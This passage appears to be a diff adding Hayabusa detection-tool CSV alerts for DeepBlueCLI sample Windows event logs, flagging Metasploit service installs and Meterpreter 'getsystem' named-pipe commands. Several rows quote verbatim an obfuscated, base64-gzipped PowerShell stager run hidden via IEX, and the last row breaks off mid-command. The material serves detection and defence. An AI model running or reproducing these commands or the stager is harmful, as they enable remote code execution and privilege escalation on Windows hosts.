+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object 